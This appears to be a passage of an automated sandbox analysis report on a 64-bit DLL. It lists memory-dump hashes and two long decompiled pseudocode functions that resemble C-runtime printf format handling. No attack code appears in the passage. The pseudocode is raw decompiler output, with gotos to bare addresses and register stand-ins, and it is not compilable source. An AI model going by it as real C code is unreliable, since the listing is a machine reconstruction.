                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastNameTranslate$CodePageValidValue_invalid_parameter_noinfo
                                                                      • String ID:
                                                                      • API String ID: 4023145424-0
                                                                      • Opcode ID: e35c9c83b6621267efbfa96a6f02049159a1fac8090f9d4154a59d83bf2ac146
                                                                      • Instruction ID: 8b4f650e79c2adfae2fb9d7fec3dff5ee1ac8f9d74da4d170ae4c956a3ed5e78
                                                                      • Opcode Fuzzy Hash: e35c9c83b6621267efbfa96a6f02049159a1fac8090f9d4154a59d83bf2ac146
                                                                      • Instruction Fuzzy Hash: BDE1A236204AC885EBA79B61D4507EB67A0F79EBC8F418225FE49876C5EF38C649C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 59%
                                                                      			E0000000118002B8D0(void* __edi, void* __esi, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r10, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v40;
                                                                      				signed int _v56;
                                                                      				char _v68;
                                                                      				char _v70;
                                                                      				signed int _v72;
                                                                      				long long _v88;
                                                                      				void* __rbp;
                                                                      				intOrPtr _t122;
                                                                      				void* _t125;
                                                                      				unsigned int _t166;
                                                                      				intOrPtr _t167;
                                                                      				unsigned int _t174;
                                                                      				signed char _t193;
                                                                      				void* _t194;
                                                                      				void* _t203;
                                                                      				signed long long _t272;
                                                                      				void* _t288;
                                                                      				intOrPtr* _t292;
                                                                      				intOrPtr* _t295;
                                                                      				signed int* _t310;
                                                                      				void* _t313;
                                                                      				void* _t317;
                                                                      				void* _t318;
                                                                      				void* _t321;
                                                                      				void* _t334;
                                                                      				intOrPtr* _t336;
                                                                      
                                                                      				_t321 = __r8;
                                                                      				_t312 = __rsi;
                                                                      				_t309 = __rdi;
                                                                      				_t194 = __edi;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t317 = _t318;
                                                                      				_t272 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_v56 = _t272 ^ _t318 - 0x00000050;
                                                                      				_t122 =  *((intOrPtr*)(__rcx + 0x39));
                                                                      				_t288 = __rcx;
                                                                      				r13d = 1;
                                                                      				dil = 0x78;
                                                                      				r14b = 0x58;
                                                                      				r15b = 0x41;
                                                                      				_t203 = _t122 - 0x64;
                                                                      				if (_t203 > 0) goto 0x8002b973;
                                                                      				if (_t203 == 0) goto 0x8002b9d6;
                                                                      				if (_t122 == r15b) goto 0x8002b9e3;
                                                                      				if (_t122 == 0x43) goto 0x8002b956;
                                                                      				if (_t122 - 0x44 <= 0) goto 0x8002b9ec;
                                                                      				if (_t122 - 0x47 <= 0) goto 0x8002b9e3;
                                                                      				if (_t122 == 0x53) goto 0x8002b998;
                                                                      				if (_t122 == r14b) goto 0x8002b969;
                                                                      				if (_t122 == 0x5a) goto 0x8002b962;
                                                                      				if (_t122 == 0x61) goto 0x8002b9e3;
                                                                      				if (_t122 != 0x63) goto 0x8002b9ec;
                                                                      				E000000011800310F0(_t122, _t122 - 0x63, __rcx, __rcx);
                                                                      				goto 0x8002b9e8;
                                                                      				E0000000118002ED24(_t122 - 0x63, __rcx);
                                                                      				goto 0x8002b9e8;
                                                                      				_t125 = E0000000118001E508(r13b, __esi, __rcx, __rcx, __rdi, __rsi, _t321, __r10);
                                                                      				goto 0x8002b9e8;
                                                                      				if (_t125 - 0x67 <= 0) goto 0x8002b9e3;
                                                                      				if (_t125 == 0x69) goto 0x8002b9d6;
                                                                      				if (_t125 == 0x6e) goto 0x8002b9cf;
                                                                      				if (_t125 == 0x6f) goto 0x8002b9af;
                                                                      				if (_t125 == 0x70) goto 0x8002b99f;
                                                                      				if (_t125 == 0x73) goto 0x8002b998;
                                                                      				if (_t125 == 0x75) goto 0x8002b9da;
                                                                      				if (_t125 != dil) goto 0x8002b9ec;
                                                                      				goto 0x8002b96c;
                                                                      				E0000000118003271C(_t125 - dil, __rcx, __rcx);
                                                                      				goto 0x8002b9e8;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 0x10;
                                                                      				 *((intOrPtr*)(__rcx + 0x34)) = 0xb;
                                                                      				goto 0x8002b969;
                                                                      				_t166 =  *(__rcx + 0x28);
                                                                      				if ((r13b & _t166 >> 0x00000005) == 0) goto 0x8002b9c3;
                                                                      				asm("bts ecx, 0x7");
                                                                      				 *(__rcx + 0x28) = _t166;
                                                                      				E0000000118001B4F8(0, __esi, __rcx, __rcx, _t309, _t312, _t321, __r10);
                                                                      				goto 0x8002b9e8;
                                                                      				E00000001180031B98(r13b & _t166 >> 0x00000005, __rcx, _t312, _t317, __r10);
                                                                      				goto 0x8002b9e8;
                                                                      				 *(__rcx + 0x28) =  *(__rcx + 0x28) | 0x00000010;
                                                                      				E0000000118001CD00(0, __esi, __rcx, __rcx, _t309, _t312, _t321, __r10);
                                                                      				goto 0x8002b9e8;
                                                                      				if (E0000000118002F548(0, _t194, __rcx, __rcx, _t312, _t317) != 0) goto 0x8002b9f3;
                                                                      				goto 0x8002bcef;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x474)) != 2) goto 0x8002ba09;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x470)) == r13d) goto 0x8002bcec;
                                                                      				if ( *((char*)(__rcx + 0x38)) != 0) goto 0x8002bcec;
                                                                      				_t193 =  *(__rcx + 0x28);
                                                                      				_v72 = 0;
                                                                      				_v70 = 0;
                                                                      				if ((r13b & 0) == 0) goto 0x8002ba56;
                                                                      				if ((r13b & 0) == 0) goto 0x8002ba3b;
                                                                      				_v72 = 0x2d;
                                                                      				goto 0x8002ba53;
                                                                      				if ((r13b & _t193) == 0) goto 0x8002ba46;
                                                                      				_v72 = 0x2b;
                                                                      				goto 0x8002ba53;
                                                                      				if ((r13b & 0) == 0) goto 0x8002ba56;
                                                                      				_v72 = 0x20;
                                                                      				_t313 = _t334;
                                                                      				_t167 =  *((intOrPtr*)(__rcx + 0x39));
                                                                      				if ((_t167 - r14b & 0x000000df) != 0) goto 0x8002ba71;
                                                                      				if ((r13b & _t193 >> 0x00000005) == 0) goto 0x8002ba71;
                                                                      				r8b = r13b;
                                                                      				goto 0x8002ba74;
                                                                      				r8b = 0;
                                                                      				if (r8b != 0) goto 0x8002ba87;
                                                                      				if ((_t167 - r15b & 0xffffff00 | (_t167 - r15b & 0x000000df) == 0x00000000) == 0) goto 0x8002baa2;
                                                                      				 *((char*)(_t317 + _t313 - 0x20)) = 0x30;
                                                                      				if (_t167 == r14b) goto 0x8002ba96;
                                                                      				if (_t167 != r15b) goto 0x8002ba99;
                                                                      				dil = r14b;
                                                                      				 *((intOrPtr*)(_t317 + _t313 - 0x1f)) = dil;
                                                                      				r15d =  *((intOrPtr*)(__rcx + 0x2c));
                                                                      				r15d = r15d -  *((intOrPtr*)(__rcx + 0x48));
                                                                      				r15d = r15d;
                                                                      				if ((_t193 & 0x0000000c) != 0) goto 0x8002bb12;
                                                                      				if (r15d <= 0) goto 0x8002bb12;
                                                                      				if ((r13b &  *( *((intOrPtr*)(__rcx + 0x460)) + 0x14) >> 0x0000000c) == 0) goto 0x8002badd;
                                                                      				if ( *((long long*)( *((intOrPtr*)(__rcx + 0x460)) + 8)) == 0) goto 0x8002baf6;
                                                                      				if (E00000001180041944(0x20,  *((long long*)( *((intOrPtr*)(__rcx + 0x460)) + 8)),  *((intOrPtr*)(__rcx + 0x460))) == 0xffffffff) goto 0x8002bb0e;
                                                                      				 *(__rcx + 0x20) = __rcx + 1;
                                                                      				if ( *(__rcx + 0x20) == 0xfffffffe) goto 0x8002bb12;
                                                                      				if (0 + r13d - r15d < 0) goto 0x8002babd;
                                                                      				goto 0x8002bb12;
                                                                      				 *(__rcx + 0x20) =  *(__rcx + 0x20) | 0xffffffff;
                                                                      				_t62 = _t288 + 0x460; // 0x4a1
                                                                      				_t336 = _t62;
                                                                      				_t63 = _t288 + 0x20; // 0x61
                                                                      				_t310 = _t63;
                                                                      				if ((r13b &  *( *_t336 + 0x14) >> 0x0000000c) == 0) goto 0x8002bb3d;
                                                                      				if ( *((long long*)( *_t336 + 8)) != 0) goto 0x8002bb3d;
                                                                      				 *_t310 =  *_t310;
                                                                      				goto 0x8002bb54;
                                                                      				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_t69 =  &_v72; // -31
                                                                      				r8d = 0;
                                                                      				_t292 = _t336;
                                                                      				E000000011800361F0(__rcx, _t292, _t69, _t313 + 2, _t317, _t310);
                                                                      				_t174 =  *(__rcx + 0x28);
                                                                      				if ((r13b & _t174 >> 0x00000003) == 0) goto 0x8002bbba;
                                                                      				if ((r13b & _t174 >> 0x00000002) != 0) goto 0x8002bbba;
                                                                      				if (r15d <= 0) goto 0x8002bbba;
                                                                      				if ((r13b &  *( *_t336 + 0x14) >> 0x0000000c) == 0) goto 0x8002bb8c;
                                                                      				if ( *((long long*)( *_t336 + 8)) == 0) goto 0x8002bba1;
                                                                      				if (E00000001180041944(0x30,  *((long long*)( *_t336 + 8)),  *_t336) == 0xffffffff) goto 0x8002bbb7;
                                                                      				 *_t310 = _t292 + 1;
                                                                      				if ( *_t310 == 0xfffffffe) goto 0x8002bbba;
                                                                      				if (0 + r13d - r15d < 0) goto 0x8002bb74;
                                                                      				goto 0x8002bbba;
                                                                      				 *_t310 =  *_t310 | 0xffffffff;
                                                                      				if ( *((char*)(__rcx + 0x4c)) == 0) goto 0x8002bc4f;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x48)) <= 0) goto 0x8002bc4f;
                                                                      				_t85 =  &_v68; // -27
                                                                      				r9d =  *( *(__rcx + 0x40)) & 0x0000ffff;
                                                                      				_t86 =  &_v72; // -31
                                                                      				_v72 = _v72 & 0x00000000;
                                                                      				r8d = 6;
                                                                      				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                      				if (E00000001180040970( *((intOrPtr*)(__rcx + 8)), __rcx, _t86, _t85, _t317,  *((intOrPtr*)(__rcx + 8))) != 0) goto 0x8002bc4a;
                                                                      				r8d = _v72;
                                                                      				if (r8d == 0) goto 0x8002bc4a;
                                                                      				if ((r13b &  *( *_t336 + 0x14) >> 0x0000000c) == 0) goto 0x8002bc2c;
                                                                      				if ( *((long long*)( *_t336 + 8)) != 0) goto 0x8002bc2c;
                                                                      				 *_t310 =  *_t310 + r8d;
                                                                      				goto 0x8002bc40;
                                                                      				_v88 =  *((intOrPtr*)(_t288 + 8));
                                                                      				_t98 =  &_v68; // -27
                                                                      				E000000011800361F0(_t288, _t336, _t98, _t313 + 2, _t317, _t310);
                                                                      				if (0 + r13d !=  *(_t288 + 0x48)) goto 0x8002bbd4;
                                                                      				goto 0x8002bc8b;
                                                                      				 *_t310 =  *_t310 | 0xffffffff;
                                                                      				goto 0x8002bc8b;
                                                                      				r8d =  *(_t288 + 0x48);
                                                                      				if ((r13b &  *( *_t336 + 0x14) >> 0x0000000c) == 0) goto 0x8002bc78;
                                                                      				if ( *((long long*)( *_t336 + 8)) != 0) goto 0x8002bc78;
                                                                      				 *_t310 =  *_t310 + r8d;
                                                                      				goto 0x8002bc8b;
                                                                      				_v88 =  *((intOrPtr*)(_t288 + 8));
                                                                      				_t295 = _t336;
                                                                      				E000000011800361F0(_t288, _t295,  *((intOrPtr*)(_t288 + 0x40)), _t313 + 2, _t317, _t310);
                                                                      				if ( *_t310 < 0) goto 0x8002bcec;
                                                                      				if ((r13b &  *(_t288 + 0x28) >> 0x00000002) == 0) goto 0x8002bcec;
                                                                      				if (r15d <= 0) goto 0x8002bcec;
                                                                      				if ((r13b &  *( *_t336 + 0x14) >> 0x0000000c) == 0) goto 0x8002bcbe;
                                                                      				if ( *((long long*)( *_t336 + 8)) == 0) goto 0x8002bcd3;
                                                                      				if (E00000001180041944(0x20,  *((long long*)( *_t336 + 8)),  *_t336) == 0xffffffff) goto 0x8002bce9;
                                                                      				 *_t310 = _t295 + 1;
                                                                      				if ( *_t310 == 0xfffffffe) goto 0x8002bcec;
                                                                      				if (0 + r13d - r15d < 0) goto 0x8002bca6;
                                                                      				goto 0x8002bcec;
                                                                      				 *_t310 =  *_t310 | 0xffffffff;
                                                                      				return E000000011800028F0(r13b,  *_t310, _v56 ^ _t318 - 0x00000050);
                                                                      			}





























                                                                      0x18002b8d0
                                                                      0x18002b8d0
                                                                      0x18002b8d0
                                                                      0x18002b8d0
                                                                      0x18002b8d0
                                                                      0x18002b8d5
                                                                      0x18002b8da
                                                                      0x18002b8e8
                                                                      0x18002b8ef
                                                                      0x18002b8f9
                                                                      0x18002b8fd
                                                                      0x18002b900
                                                                      0x18002b903
                                                                      0x18002b909
                                                                      0x18002b90c
                                                                      0x18002b90f
                                                                      0x18002b912
                                                                      0x18002b914
                                                                      0x18002b916
                                                                      0x18002b91f
                                                                      0x18002b927
                                                                      0x18002b92b
                                                                      0x18002b933
                                                                      0x18002b93b
                                                                      0x18002b940
                                                                      0x18002b944
                                                                      0x18002b948
                                                                      0x18002b950
                                                                      0x18002b958
                                                                      0x18002b95d
                                                                      0x18002b962
                                                                      0x18002b967
                                                                      0x18002b96c
                                                                      0x18002b971
                                                                      0x18002b975
                                                                      0x18002b979
                                                                      0x18002b97d
                                                                      0x18002b981
                                                                      0x18002b985
                                                                      0x18002b989
                                                                      0x18002b98d
                                                                      0x18002b992
                                                                      0x18002b996
                                                                      0x18002b998
                                                                      0x18002b99d
                                                                      0x18002b99f
                                                                      0x18002b9a6
                                                                      0x18002b9ad
                                                                      0x18002b9af
                                                                      0x18002b9ba
                                                                      0x18002b9bc
                                                                      0x18002b9c0
                                                                      0x18002b9c8
                                                                      0x18002b9cd
                                                                      0x18002b9cf
                                                                      0x18002b9d4
                                                                      0x18002b9d6
                                                                      0x18002b9dc
                                                                      0x18002b9e1
                                                                      0x18002b9ea
                                                                      0x18002b9ee
                                                                      0x18002b9fa
                                                                      0x18002ba03
                                                                      0x18002ba0d
                                                                      0x18002ba13
                                                                      0x18002ba18
                                                                      0x18002ba1e
                                                                      0x18002ba29
                                                                      0x18002ba33
                                                                      0x18002ba35
                                                                      0x18002ba39
                                                                      0x18002ba3e
                                                                      0x18002ba40
                                                                      0x18002ba44
                                                                      0x18002ba4d
                                                                      0x18002ba4f
                                                                      0x18002ba53
                                                                      0x18002ba56
                                                                      0x18002ba60
                                                                      0x18002ba6a
                                                                      0x18002ba6c
                                                                      0x18002ba6f
                                                                      0x18002ba71
                                                                      0x18002ba81
                                                                      0x18002ba85
                                                                      0x18002ba87
                                                                      0x18002ba8f
                                                                      0x18002ba94
                                                                      0x18002ba96
                                                                      0x18002ba99
                                                                      0x18002baa2
                                                                      0x18002baa6
                                                                      0x18002baaa
                                                                      0x18002bab0
                                                                      0x18002babb
                                                                      0x18002bacd
                                                                      0x18002badb
                                                                      0x18002baf4
                                                                      0x18002bafc
                                                                      0x18002bb02
                                                                      0x18002bb0a
                                                                      0x18002bb0c
                                                                      0x18002bb0e
                                                                      0x18002bb16
                                                                      0x18002bb16
                                                                      0x18002bb20
                                                                      0x18002bb20
                                                                      0x18002bb2d
                                                                      0x18002bb37
                                                                      0x18002bb39
                                                                      0x18002bb3b
                                                                      0x18002bb3d
                                                                      0x18002bb45
                                                                      0x18002bb49
                                                                      0x18002bb4c
                                                                      0x18002bb4f
                                                                      0x18002bb54
                                                                      0x18002bb5f
                                                                      0x18002bb67
                                                                      0x18002bb72
                                                                      0x18002bb80
                                                                      0x18002bb8a
                                                                      0x18002bb9f
                                                                      0x18002bba6
                                                                      0x18002bbab
                                                                      0x18002bbb3
                                                                      0x18002bbb5
                                                                      0x18002bbb7
                                                                      0x18002bbbe
                                                                      0x18002bbc8
                                                                      0x18002bbd8
                                                                      0x18002bbdc
                                                                      0x18002bbe1
                                                                      0x18002bbe5
                                                                      0x18002bbee
                                                                      0x18002bbf4
                                                                      0x18002bc00
                                                                      0x18002bc02
                                                                      0x18002bc09
                                                                      0x18002bc1b
                                                                      0x18002bc25
                                                                      0x18002bc27
                                                                      0x18002bc2a
                                                                      0x18002bc2c
                                                                      0x18002bc34
                                                                      0x18002bc3b
                                                                      0x18002bc46
                                                                      0x18002bc48
                                                                      0x18002bc4a
                                                                      0x18002bc4d
                                                                      0x18002bc56
                                                                      0x18002bc67
                                                                      0x18002bc71
                                                                      0x18002bc73
                                                                      0x18002bc76
                                                                      0x18002bc78
                                                                      0x18002bc83
                                                                      0x18002bc86
                                                                      0x18002bc8e
                                                                      0x18002bc99
                                                                      0x18002bca4
                                                                      0x18002bcb2
                                                                      0x18002bcbc
                                                                      0x18002bcd1
                                                                      0x18002bcd8
                                                                      0x18002bcdd
                                                                      0x18002bce5
                                                                      0x18002bce7
                                                                      0x18002bce9
                                                                      0x18002bd18

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6496bd5768185d4c9742a925ed1855bae2cd249baac842407ccf34cebc50da7f
                                                                      • Instruction ID: 1b2595a0299b4d3d086d5f8b7d4ccb8596819a77989bcdbc96e0e0a414da8923
                                                                      • Opcode Fuzzy Hash: 6496bd5768185d4c9742a925ed1855bae2cd249baac842407ccf34cebc50da7f
                                                                      • Instruction Fuzzy Hash: 4CE1A27260464885EBEB8B29C1543EE37A1E74DBD8F15C216EE55873D9CF35CA8AC301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 61%
                                                                      			E0000000118002B49C(void* __edi, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r10, long long _a16, long long _a24, long long _a32) {
                                                                      				void* _v40;
                                                                      				signed int _v56;
                                                                      				char _v68;
                                                                      				char _v70;
                                                                      				signed int _v72;
                                                                      				long long _v88;
                                                                      				void* __rbp;
                                                                      				intOrPtr _t120;
                                                                      				void* _t123;
                                                                      				unsigned int _t164;
                                                                      				signed char _t165;
                                                                      				unsigned int _t172;
                                                                      				intOrPtr _t191;
                                                                      				void* _t192;
                                                                      				void* _t200;
                                                                      				signed long long _t267;
                                                                      				void* _t283;
                                                                      				intOrPtr* _t287;
                                                                      				intOrPtr* _t290;
                                                                      				void* _t293;
                                                                      				signed int* _t305;
                                                                      				void* _t308;
                                                                      				void* _t312;
                                                                      				void* _t313;
                                                                      				void* _t316;
                                                                      				void* _t329;
                                                                      				intOrPtr* _t331;
                                                                      
                                                                      				_t316 = __r8;
                                                                      				_t307 = __rsi;
                                                                      				_t293 = __rdx;
                                                                      				_t192 = __edi;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rsi;
                                                                      				_a32 = __rdi;
                                                                      				_t312 = _t313;
                                                                      				_t267 =  *0x80070098; // 0xd02b0a549a3
                                                                      				_v56 = _t267 ^ _t313 - 0x00000050;
                                                                      				_t120 =  *((intOrPtr*)(__rcx + 0x39));
                                                                      				_t283 = __rcx;
                                                                      				r13d = 1;
                                                                      				dil = 0x78;
                                                                      				r14b = 0x58;
                                                                      				r15b = 0x41;
                                                                      				_t200 = _t120 - 0x64;
                                                                      				if (_t200 > 0) goto 0x8002b53f;
                                                                      				if (_t200 == 0) goto 0x8002b5a2;
                                                                      				if (_t120 == r15b) goto 0x8002b5af;
                                                                      				if (_t120 == 0x43) goto 0x8002b522;
                                                                      				if (_t120 - 0x44 <= 0) goto 0x8002b5b8;
                                                                      				if (_t120 - 0x47 <= 0) goto 0x8002b5af;
                                                                      				if (_t120 == 0x53) goto 0x8002b564;
                                                                      				if (_t120 == r14b) goto 0x8002b535;
                                                                      				if (_t120 == 0x5a) goto 0x8002b52e;
                                                                      				if (_t120 == 0x61) goto 0x8002b5af;
                                                                      				if (_t120 != 0x63) goto 0x8002b5b8;
                                                                      				E0000000118003102C(_t120, _t120 - 0x63, __rcx);
                                                                      				goto 0x8002b5b4;
                                                                      				E0000000118002ECAC(__rcx);
                                                                      				goto 0x8002b5b4;
                                                                      				_t123 = E0000000118001E320(r13b, __rcx, __rcx, _t293, __rsi, _t312, _t316, __r10);
                                                                      				goto 0x8002b5b4;
                                                                      				if (_t123 - 0x67 <= 0) goto 0x8002b5af;
                                                                      				if (_t123 == 0x69) goto 0x8002b5a2;
                                                                      				if (_t123 == 0x6e) goto 0x8002b59b;
                                                                      				if (_t123 == 0x6f) goto 0x8002b57b;
                                                                      				if (_t123 == 0x70) goto 0x8002b56b;
                                                                      				if (_t123 == 0x73) goto 0x8002b564;
                                                                      				if (_t123 == 0x75) goto 0x8002b5a6;
                                                                      				if (_t123 != dil) goto 0x8002b5b8;
                                                                      				goto 0x8002b538;
                                                                      				E00000001180032684(__rcx);
                                                                      				goto 0x8002b5b4;
                                                                      				 *((intOrPtr*)(__rcx + 0x30)) = 0x10;
                                                                      				 *((intOrPtr*)(__rcx + 0x34)) = 0xb;
                                                                      				goto 0x8002b535;
                                                                      				_t164 =  *(__rcx + 0x28);
                                                                      				if ((r13b & _t164 >> 0x00000005) == 0) goto 0x8002b58f;
                                                                      				asm("bts ecx, 0x7");
                                                                      				 *(__rcx + 0x28) = _t164;
                                                                      				E0000000118001B310(0, __rcx, __rcx, _t293, _t307, _t312, _t316, __r10);
                                                                      				goto 0x8002b5b4;
                                                                      				E00000001180031AE4(__rcx, __rcx);
                                                                      				goto 0x8002b5b4;
                                                                      				 *(__rcx + 0x28) =  *(__rcx + 0x28) | 0x00000010;
                                                                      				E0000000118001CB18(0, __rcx, __rcx, _t293, _t307, _t312, _t316, __r10);
                                                                      				goto 0x8002b5b4;
                                                                      				if (E0000000118002F2FC(0, _t192, __rcx, __rcx, _t307, _t312) != 0) goto 0x8002b5bf;
                                                                      				goto 0x8002b8a5;
                                                                      				if ( *((char*)(__rcx + 0x38)) != 0) goto 0x8002b8a2;
                                                                      				_t165 =  *(__rcx + 0x28);
                                                                      				_v72 = 0;
                                                                      				_v70 = 0;
                                                                      				if ((r13b & 0) == 0) goto 0x8002b60c;
                                                                      				if ((r13b & 0) == 0) goto 0x8002b5f1;
                                                                      				_v72 = 0x2d;
                                                                      				goto 0x8002b609;
                                                                      				if ((r13b & _t165) == 0) goto 0x8002b5fc;
                                                                      				_v72 = 0x2b;
                                                                      				goto 0x8002b609;
                                                                      				if ((r13b & 0) == 0) goto 0x8002b60c;
                                                                      				_v72 = 0x20;
                                                                      				_t308 = _t329;
                                                                      				_t191 =  *((intOrPtr*)(__rcx + 0x39));
                                                                      				if ((_t191 - r14b & 0x000000df) != 0) goto 0x8002b627;
                                                                      				if ((r13b & _t165 >> 0x00000005) == 0) goto 0x8002b627;
                                                                      				r8b = r13b;
                                                                      				goto 0x8002b62a;
                                                                      				r8b = 0;
                                                                      				if (r8b != 0) goto 0x8002b63d;
                                                                      				if ((_t191 - r15b & 0xffffff00 | (_t191 - r15b & 0x000000df) == 0x00000000) == 0) goto 0x8002b658;
                                                                      				 *((char*)(_t312 + _t308 - 0x20)) = 0x30;
                                                                      				if (_t191 == r14b) goto 0x8002b64c;
                                                                      				if (_t191 != r15b) goto 0x8002b64f;
                                                                      				dil = r14b;
                                                                      				 *((intOrPtr*)(_t312 + _t308 - 0x1f)) = dil;
                                                                      				r15d =  *((intOrPtr*)(__rcx + 0x2c));
                                                                      				r15d = r15d -  *((intOrPtr*)(__rcx + 0x48));
                                                                      				r15d = r15d;
                                                                      				if ((_t165 & 0x0000000c) != 0) goto 0x8002b6c8;
                                                                      				if (r15d <= 0) goto 0x8002b6c8;
                                                                      				if ((r13b &  *( *((intOrPtr*)(__rcx + 0x460)) + 0x14) >> 0x0000000c) == 0) goto 0x8002b693;
                                                                      				if ( *((long long*)( *((intOrPtr*)(__rcx + 0x460)) + 8)) == 0) goto 0x8002b6ac;
                                                                      				if (E00000001180041944(0x20,  *((long long*)( *((intOrPtr*)(__rcx + 0x460)) + 8)),  *((intOrPtr*)(__rcx + 0x460))) == 0xffffffff) goto 0x8002b6c4;
                                                                      				 *(__rcx + 0x20) = __rcx + 1;
                                                                      				if ( *(__rcx + 0x20) == 0xfffffffe) goto 0x8002b6c8;
                                                                      				if (0 + r13d - r15d < 0) goto 0x8002b673;
                                                                      				goto 0x8002b6c8;
                                                                      				 *(__rcx + 0x20) =  *(__rcx + 0x20) | 0xffffffff;
                                                                      				_t60 = _t283 + 0x460; // 0x4a1
                                                                      				_t331 = _t60;
                                                                      				_t61 = _t283 + 0x20; // 0x61
                                                                      				_t305 = _t61;
                                                                      				if ((r13b &  *( *_t331 + 0x14) >> 0x0000000c) == 0) goto 0x8002b6f3;
                                                                      				if ( *((long long*)( *_t331 + 8)) != 0) goto 0x8002b6f3;
                                                                      				 *_t305 =  *_t305;
                                                                      				goto 0x8002b70a;
                                                                      				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_t67 =  &_v72; // -31
                                                                      				r8d = 0;
                                                                      				_t287 = _t331;
                                                                      				E000000011800361F0(__rcx, _t287, _t67, _t308 + 2, _t312, _t305);
                                                                      				_t172 =  *(__rcx + 0x28);
                                                                      				if ((r13b & _t172 >> 0x00000003) == 0) goto 0x8002b770;
                                                                      				if ((r13b & _t172 >> 0x00000002) != 0) goto 0x8002b770;
                                                                      				if (r15d <= 0) goto 0x8002b770;
                                                                      				if ((r13b &  *( *_t331 + 0x14) >> 0x0000000c) == 0) goto 0x8002b742;
                                                                      				if ( *((long long*)( *_t331 + 8)) == 0) goto 0x8002b757;
                                                                      				if (E00000001180041944(0x30,  *((long long*)( *_t331 + 8)),  *_t331) == 0xffffffff) goto 0x8002b76d;
                                                                      				 *_t305 = _t287 + 1;
                                                                      				if ( *_t305 == 0xfffffffe) goto 0x8002b770;
                                                                      				if (0 + r13d - r15d < 0) goto 0x8002b72a;
                                                                      				goto 0x8002b770;
                                                                      				 *_t305 =  *_t305 | 0xffffffff;
                                                                      				if ( *((char*)(__rcx + 0x4c)) == 0) goto 0x8002b805;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x48)) <= 0) goto 0x8002b805;
                                                                      				_t83 =  &_v68; // -27
                                                                      				r9d =  *( *(__rcx + 0x40)) & 0x0000ffff;
                                                                      				_t84 =  &_v72; // -31
                                                                      				_v72 = _v72 & 0x00000000;
                                                                      				r8d = 6;
                                                                      				_v88 =  *((intOrPtr*)(__rcx + 8));
                                                                      				if (E00000001180040970( *((intOrPtr*)(__rcx + 8)), __rcx, _t84, _t83, _t312,  *((intOrPtr*)(__rcx + 8))) != 0) goto 0x8002b800;
                                                                      				r8d = _v72;
                                                                      				if (r8d == 0) goto 0x8002b800;
                                                                      				if ((r13b &  *( *_t331 + 0x14) >> 0x0000000c) == 0) goto 0x8002b7e2;
                                                                      				if ( *((long long*)( *_t331 + 8)) != 0) goto 0x8002b7e2;
                                                                      				 *_t305 =  *_t305 + r8d;
                                                                      				goto 0x8002b7f6;
                                                                      				_v88 =  *((intOrPtr*)(_t283 + 8));
                                                                      				_t96 =  &_v68; // -27
                                                                      				E000000011800361F0(_t283, _t331, _t96, _t308 + 2, _t312, _t305);
                                                                      				if (0 + r13d !=  *(_t283 + 0x48)) goto 0x8002b78a;
                                                                      				goto 0x8002b841;
                                                                      				 *_t305 =  *_t305 | 0xffffffff;
                                                                      				goto 0x8002b841;
                                                                      				r8d =  *(_t283 + 0x48);
                                                                      				if ((r13b &  *( *_t331 + 0x14) >> 0x0000000c) == 0) goto 0x8002b82e;
                                                                      				if ( *((long long*)( *_t331 + 8)) != 0) goto 0x8002b82e;
                                                                      				 *_t305 =  *_t305 + r8d;
                                                                      				goto 0x8002b841;
                                                                      				_v88 =  *((intOrPtr*)(_t283 + 8));
                                                                      				_t290 = _t331;
                                                                      				E000000011800361F0(_t283, _t290,  *((intOrPtr*)(_t283 + 0x40)), _t308 + 2, _t312, _t305);
                                                                      				if ( *_t305 < 0) goto 0x8002b8a2;
                                                                      				if ((r13b &  *(_t283 + 0x28) >> 0x00000002) == 0) goto 0x8002b8a2;
                                                                      				if (r15d <= 0) goto 0x8002b8a2;
                                                                      				if ((r13b &  *( *_t331 + 0x14) >> 0x0000000c) == 0) goto 0x8002b874;
                                                                      				if ( *((long long*)( *_t331 + 8)) == 0) goto 0x8002b889;
                                                                      				if (E00000001180041944(0x20,  *((long long*)( *_t331 + 8)),  *_t331) == 0xffffffff) goto 0x8002b89f;
                                                                      				 *_t305 = _t290 + 1;
                                                                      				if ( *_t305 == 0xfffffffe) goto 0x8002b8a2;
                                                                      				if (0 + r13d - r15d < 0) goto 0x8002b85c;
                                                                      				goto 0x8002b8a2;
                                                                      				 *_t305 =  *_t305 | 0xffffffff;
